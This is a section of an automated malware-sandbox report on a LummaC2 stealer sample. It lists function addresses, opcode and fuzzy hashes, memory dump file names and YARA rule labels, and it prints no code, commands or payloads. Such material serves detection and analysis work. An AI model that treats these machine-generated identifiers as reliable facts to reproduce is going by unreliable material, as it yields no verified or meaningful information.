                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $%&'
                                              • API String ID: 0-1447449905
                                              • Opcode ID: b7cdf62230e2c90fb59e1c1680c5fe7f288f4a2ceb1edbf7e93d68ad3c92bcc7
                                              • Instruction ID: 9491e7c3d31433dfa7af98d0cbdea9ec2f1534dcec79c6f106be84ca775cde88
                                              • Opcode Fuzzy Hash: b7cdf62230e2c90fb59e1c1680c5fe7f288f4a2ceb1edbf7e93d68ad3c92bcc7
                                              • Instruction Fuzzy Hash: D09138726082614BC716CE68C8902AFBBE1AB95324F19867DECF96B3D2C234DC45D7D1
                                              Function 00DF5F40 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,
                                              • API String ID: 0-3772416878
                                              • Opcode ID: 7a9d055cfabe90afec6c5612542bf7b948ce648e01e6248f440c0145562d7db6
                                              • Instruction ID: 856250627fa3d983f52e4ab33b875dad78ab83be3b26885f3dba5049f55565b5
                                              • Opcode Fuzzy Hash: 7a9d055cfabe90afec6c5612542bf7b948ce648e01e6248f440c0145562d7db6
                                              • Instruction Fuzzy Hash: 71B14C701083859FC321CF58C98061BFBE0AFA9704F488A6DF5D997742D631E918CBA7
                                              Function 00E34E80 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: XQZ[
                                              • API String ID: 0-4268654964
                                              • Opcode ID: d24cd338cdab00d62140ad527650b79e3fdcd5666a22d500354e5f1b581296e1
                                              • Instruction ID: 9b36fb14132b50b26b3057d500fd4922335069264689ab44ed96a34d3618b7a4
                                              • Opcode Fuzzy Hash: d24cd338cdab00d62140ad527650b79e3fdcd5666a22d500354e5f1b581296e1
                                              • Instruction Fuzzy Hash: F981FF752047069FC724DF28C8A4A6ABBF1EF85358F14952CE9959B3E1E732EC10CB41
                                              Function 00E02ACB Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [
                                              • API String ID: 0-784033777
                                              • Opcode ID: 36f43e051437452bb059b96fc497a7c74dfce69599b2f692ba8b74b9f6787a06
                                              • Instruction ID: 2f1394a150f95394499b6400104c7924e0c04fbfc5094d2f0dd0992675e494f4
                                              • Opcode Fuzzy Hash: 36f43e051437452bb059b96fc497a7c74dfce69599b2f692ba8b74b9f6787a06
                                              • Instruction Fuzzy Hash: A9A1C6726087508BC3249F3888853AEFBD1AFD5324F1A8A2DE9EDD73C1D67488418B53
                                              Function 00E1EBF0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "
                                              • API String ID: 0-123907689
                                              • Opcode ID: b9f92e753ab11b02b4db420d9e8affd654e3e3fea257bc5cec012aafe12283da
                                              • Instruction ID: 23a390821e81995c2b31d4250a2f4c049965003d3bf4933f74d26212d5e5be9b
                                              • Opcode Fuzzy Hash: b9f92e753ab11b02b4db420d9e8affd654e3e3fea257bc5cec012aafe12283da
                                              • Instruction Fuzzy Hash: 2571D532A083554BD714CE38C88039EFBE3ABC5714F69A96DFC94AB391D235DD858782
                                              Function 00E251C0 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 38bf0598cb9c4e89a7b80b4e9206e634f9086090b6a901b0e2f6cfa5415cd205
                                              • Instruction ID: 2d5fb6e5a52299e6fdc91464907fa1f0d30cd21ae2927047ce22b29a49e1b62d
                                              • Opcode Fuzzy Hash: 38bf0598cb9c4e89a7b80b4e9206e634f9086090b6a901b0e2f6cfa5415cd205
                                              • Instruction Fuzzy Hash: EA715A2370DAE04BD328993C6D203B9BA834BE2234F1DD76DE4F69B3D1D5658C059341
                                              Function 00E205B5 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: C^LO
                                              • API String ID: 0-1953003389
                                              • Opcode ID: 51a99051666e6366e9575c404f5b9b1e976e658ed747f2edb0ff431c725c16f7
                                              • Instruction ID: 97260eb13abe24d0e0c0d917aae0d2ba29ce4dddfd875444c5307c3acf2a0647
                                              • Opcode Fuzzy Hash: 51a99051666e6366e9575c404f5b9b1e976e658ed747f2edb0ff431c725c16f7
                                              • Instruction Fuzzy Hash: B851D66010C3928BE3099B39906477BBFD1AFD6318F285A5DF0D6AB2C2C77989058B56
                                              Function 00E20BF7 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: C^LO
                                              • API String ID: 0-1953003389
                                              • Opcode ID: a244f1f884f43a0a00c87bafd528a6a9b9ca98b5e6fa0c65c3a0e0d7430595fd
                                              • Instruction ID: 0d05824f9a4670c4fec136e73369afbf648749597bd0694508f2032706ef0e3b
                                              • Opcode Fuzzy Hash: a244f1f884f43a0a00c87bafd528a6a9b9ca98b5e6fa0c65c3a0e0d7430595fd
                                              • Instruction Fuzzy Hash: A651D76010C3928BE3099B39906477BBFD1AFD7308F286A5DF0D6AB2D3C77985058B56
                                              Function 00E335AA Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 5s4R
                                              • API String ID: 0-2387198633
                                              • Opcode ID: b1ab23e67621e9c8b78dbff951225af38f89a6a2989ecb6daedde0d6a90530a2
                                              • Instruction ID: b188554a08475474d6593e08fde3e9e4bddd16d4ee6ad8e0a891154337559462
                                              • Opcode Fuzzy Hash: b1ab23e67621e9c8b78dbff951225af38f89a6a2989ecb6daedde0d6a90530a2
                                              • Instruction Fuzzy Hash: 2E413572B183604FC324CF39898562BBBE29B89304F1EA52DE885EB756C634ED05C781
                                              Function 00E1FF19 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Ol
                                              • API String ID: 0-1916562502
                                              • Opcode ID: 6e77bf268aada77bd48e73f12fe6a71e49e0a98ec8a171fe5c7093badc2df15f
                                              • Instruction ID: 14bf5f7a1ee5c17ae6a923402445672e5800a145525708e2bff12ff2497f3b71
                                              • Opcode Fuzzy Hash: 6e77bf268aada77bd48e73f12fe6a71e49e0a98ec8a171fe5c7093badc2df15f
                                              • Instruction Fuzzy Hash: 0D41923060D3D18AE3358F25D0147EBBBF0AB97308F94596DD1DD6B2D2CB75450A8B92
                                              Function 00DFBE59 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ?<
                                              • API String ID: 0-912802884
                                              • Opcode ID: 82210d7c2eb1432462ed15922beba3a98b53dd34e863a6f89886343555adefa1
                                              • Instruction ID: 2e7d12776adc31356dd469dfb8bf020407811db529a74e6b730dd70cf8cfdd08
                                              • Opcode Fuzzy Hash: 82210d7c2eb1432462ed15922beba3a98b53dd34e863a6f89886343555adefa1
                                              • Instruction Fuzzy Hash: 96313572A183488FD318DF61CC8536FBBE1EB85318F09C83DE58197381EA79D40A8B46
                                              Function 00E20DB3 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %
                                              • API String ID: 0-2567322570
                                              • Opcode ID: 2c335efa8df2447483d193197ba7560dbf023ad3e44ad07208bb63e282fc3bd4
                                              • Instruction ID: b4f372b80120ab526ea1d80229f53ff2974b01bd54cdfc57c7d7bed9cd758156
                                              • Opcode Fuzzy Hash: 2c335efa8df2447483d193197ba7560dbf023ad3e44ad07208bb63e282fc3bd4
                                              • Instruction Fuzzy Hash: BE21E47250C2914BDB08CF35C82937BBFD6AB9A31CF195A6DD4CAE7381DA34C9058746
                                              Function 00E33B70 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: R<
                                              • API String ID: 0-1245693556
                                              • Opcode ID: f405abd5bead93992a9f9a802b14308d28037925863e874a4c161ab2fe1821fc
                                              • Instruction ID: 9beb1402be38ecbc104234a6d0669649bb8dce17bf3aa39c65a79648cdc8a4ab
                                              • Opcode Fuzzy Hash: f405abd5bead93992a9f9a802b14308d28037925863e874a4c161ab2fe1821fc
                                              • Instruction Fuzzy Hash: E511E376A18219CFCB049F21E8D8A6AFBB4FF4A704F0A546CD48677280D330DE98CB51
                                              Function 00E34780 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: @
                                              • API String ID: 2994545307-2766056989
                                              • Opcode ID: dc851a3a2f5042f14ec89f1629e5c17061f5083e40b8bfe050be3cbbb625382c
                                              • Instruction ID: a7278ac9856268033885f2bef89dd287af247e5d6846989b8006433e32549377
                                              • Opcode Fuzzy Hash: dc851a3a2f5042f14ec89f1629e5c17061f5083e40b8bfe050be3cbbb625382c
                                              • Instruction Fuzzy Hash: B521D7715043049FD318DF08D8C566BBBB4EF85328F14951CF968673E0E375A808CB96
                                              Function 00E33BB7 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: R<
                                              • API String ID: 0-1245693556
                                              • Opcode ID: 8b03426f3b78ddeccafef4a10db32ebd8127a8a5499d5d3e09d58d01aa9ae1dc
                                              • Instruction ID: f636584eefff883028b209c2630b8bb1e0ccf4e8ce1b357594750e7c20e2dce8
                                              • Opcode Fuzzy Hash: 8b03426f3b78ddeccafef4a10db32ebd8127a8a5499d5d3e09d58d01aa9ae1dc
                                              • Instruction Fuzzy Hash: E8012679A0811ACFCB149F21E8D85A5FBB0FB0A704F4A24A8C50377284D330DED4CB10
                                              Function 00E25470 Relevance: .8, Instructions: 786COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d5d84a22acf37001f44476c633a8e3166cd5099c5d74b6df36bb2e83f9cd7c8
                                              • Instruction ID: c8b7b20c29c897e032054cf940d1ebb8f81830f8c6db56a91aa01561981235cf
                                              • Opcode Fuzzy Hash: 6d5d84a22acf37001f44476c633a8e3166cd5099c5d74b6df36bb2e83f9cd7c8
                                              • Instruction Fuzzy Hash: 61625BB2615B408FD369CF3DCC09797BFE6AB89310F148A2DE0EAD3796D634A5018B51
                                              Function 00DF6770 Relevance: .7, Instructions: 665COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 86151ee1dda72d738aa654412c4ab9155618c2aba8ea183639bdef5eb31e40ca
                                              • Instruction ID: 1dc340056cad9ecec055be3252a1ac88240e149faba8e16b0d074998b74d801c
                                              • Opcode Fuzzy Hash: 86151ee1dda72d738aa654412c4ab9155618c2aba8ea183639bdef5eb31e40ca
                                              • Instruction Fuzzy Hash: 2552E570908B888FE730CF24C4843B7BBE1EF51314F19D81DD6DA46A82D679E885CB25
                                              Function 00DF2EB0 Relevance: .7, Instructions: 657COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e6d3130f78a31af0d6b474dee884996ade5b715ea694c01f05931f0fb2aaa55
                                              • Instruction ID: fde4684338008a0d89b020d9cdb4d75d4e1d4dc03e01ae6a8f19ea3f23471910
                                              • Opcode Fuzzy Hash: 3e6d3130f78a31af0d6b474dee884996ade5b715ea694c01f05931f0fb2aaa55
                                              • Instruction Fuzzy Hash: 8252D2715083499FCB15CF28C0806BABBE1BF88318F1ACA6DE9D95B341D774DA49CB91
                                              Function 00DF7540 Relevance: .6, Instructions: 625COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8b2bd0b928b1a176ecc5c8ae34785eab87b41afe56cde2327881aca01f41b1f6
                                              • Instruction ID: fef06d9fa171bc93e462f1e6c21d680fa0c801670ca597ca569617dc1fb2edff
                                              • Opcode Fuzzy Hash: 8b2bd0b928b1a176ecc5c8ae34785eab87b41afe56cde2327881aca01f41b1f6
                                              • Instruction Fuzzy Hash: 9A22A132A0C7158BC725DF18D8806FBB3E1FFC4319F1A892DDAC697285D734A9518B62
                                              Function 00DF38B0 Relevance: .6, Instructions: 600COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 258eaaba82ac806bd6a7d1fd1a117af720a803ab98e1464c3948a0e412dc7f10
                                              • Instruction ID: 31169c090c8468d6439f720f56fe859588da85fcd41ade2735e9bae3d39ec547
                                              • Opcode Fuzzy Hash: 258eaaba82ac806bd6a7d1fd1a117af720a803ab98e1464c3948a0e412dc7f10
                                              • Instruction Fuzzy Hash: 57322470914B198FC328CF29C59052ABBF1BF45710B668A2ED69787F90D776F944CB20
                                              Function 00E33F40 Relevance: .5, Instructions: 478COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
